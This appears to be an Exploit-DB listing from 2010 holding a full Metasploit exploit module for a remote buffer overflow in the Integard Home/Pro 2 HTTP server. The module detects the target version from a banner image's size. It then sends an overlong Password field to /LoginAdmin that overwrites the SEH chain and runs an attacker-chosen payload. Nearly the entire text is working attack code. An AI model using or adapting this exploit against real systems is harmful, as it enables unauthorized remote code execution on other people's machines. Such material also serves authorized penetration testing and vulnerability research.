Integard Home and Pro 2 - Remote HTTP Buffer Overflow

EDB-ID:

14941

CVE:





Platform:

Windows_x86

Date:

2010-09-07


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Integard Home/Pro version 2.0',
			'Description'    => %q{
					Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
			},
			'Author'  =>
				[
					'Lincoln',
					'Nullthreat',
					'rick2600',
					'corelanc0d3r' 
				],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: $',
			'References'    =>
				[
					['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
					'StackAdjustment' => -1500,
				},
			'Platform'       => 'win',
			'Privileged'     => false,
			'Targets'        =>
				[
					[ 'Automatic Targeting',          { 'auto' => true }],
					[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
					[ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
				],
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(18881)
			], self.class )
	end


	def exploit
		mytarget = target
		continueattack=true
		if(target['auto'])
			mytarget = nil
			print_status("[*] Automatically detecting the target...")
			connect
			response = send_request_raw(
			{'uri' => '/banner.jpg', 
			'version' => '1.1', 
			'method' => 'GET'
			}, 5)
			contlength = response['Content-Length']
			if (contlength == "24584")
				print_status("[!] Found Version - Integard Home")
				mytarget = self.targets[1]
			elsif (contlength == "23196")
				print_status("[!] Found Version - Integard Pro")
				mytarget = self.targets[2]
			else
				print_status("[-] Unknown Version")
				continueattack=false
			end
			disconnect
		end
		if continueattack
			print_status("[!] Selected Target: #{mytarget.name}")
			print_status("[*] Building Buffer")
			pay = payload.encoded
			junk = rand_text_alpha_upper(3091 - pay.length)
			jmp = "\xE9\x2B\xF8\xFF\xFF"
			nseh = "\xEB\xF9\x90\x90"
			seh = [mytarget.ret].pack('V')
			buffer = junk + pay + jmp + nseh + seh
			print_status("[*] Sending Request")
			post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
			req = "/LoginAdmin"
			connect
			send_request_raw({
				'uri' => req,
				'version' => '1.1',
				'method' => 'POST',
				'headers' => 
					{
					'Host' => '192.168.1.1:18881',
					'Content-Length' => 1074
					},
				'data' => post_data
				}, 5)
			print_status("[*] Request Sent")
			handler
		end
	end
end